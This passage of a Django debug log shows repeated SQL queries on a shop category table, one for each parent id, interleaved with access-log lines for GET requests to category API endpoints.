"shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-16 07:41:27,717 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-16 07:41:27,719 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-16 07:41:27,721 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-16 07:41:27,723 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-16 07:41:27,726 utils 20136 140506432534272 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-16 07:41:27,728 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-16 07:41:27,730 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-16 07:41:27,733 utils 20136 140506422044416 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-16 07:41:27,735 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-16 07:41:27,737 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-16 07:41:27,739 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-16 07:41:27,741 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-16 07:41:27,743 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-16 07:41:27,745 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-16 07:41:27,748 utils 20136 140506432534272 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-16 07:41:27,750 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-16 07:41:27,751 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-16 07:41:27,753 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-16 07:41:27,755 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-16 07:41:27,758 utils 20136 140506422044416 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-16 07:41:27,760 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-16 07:41:27,762 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-16 07:41:27,762 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-16 07:41:27,766 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-16 07:41:27,770 utils 20136 140506432534272 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-16 07:41:27,773 utils 20136 140506422044416 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-16 07:41:27,775 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-16 07:41:27,777 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-16 07:41:27,779 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) DEBUG 2019-12-16 07:41:27,779 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-16 07:41:27,783 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) [16/Dec/2019 07:41:27] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-16 07:41:27,785 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-16 07:41:27,788 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-16 07:41:27,791 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-16 07:41:27,793 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-16 07:41:27,796 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-16 07:41:27,798 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-16 07:41:27,800 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-16 07:41:27,803 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-16 07:41:27,806 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-16 07:41:27,808 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-16 07:41:27,810 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-16 07:41:27,812 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-16 07:41:27,816 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-16 07:41:27,818 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-16 07:41:27,820 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-16 07:41:27,822 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-16 07:41:27,825 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-16 07:41:27,827 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-16 07:41:27,830 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-16 07:41:27,832 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-16 07:41:27,834 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-16 07:41:27,837 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-16 07:41:27,839 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [16/Dec/2019 07:41:27] "GET /api/v1/categories/big-fire HTTP/1.0" 200 15396 DEBUG 2019-12-16 07:41:37,046 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 1; args=(1,) DEBUG 2019-12-16 07:41:37,051 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) [16/Dec/2019 07:41:37] "GET /api/v1/categories/1 HTTP/1.0" 200 877 DEBUG 2019-12-16 07:41:37,079 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-16 07:41:37,119 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-16 07:41:37,123 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-16 07:41:37,126 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-16 07:41:37,129 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-16 07:41:37,131 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-16 07:41:37,133 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-16 07:41:37,136 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-16 07:41:37,138 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-16 07:41:37,141 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-16 07:41:37,144 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 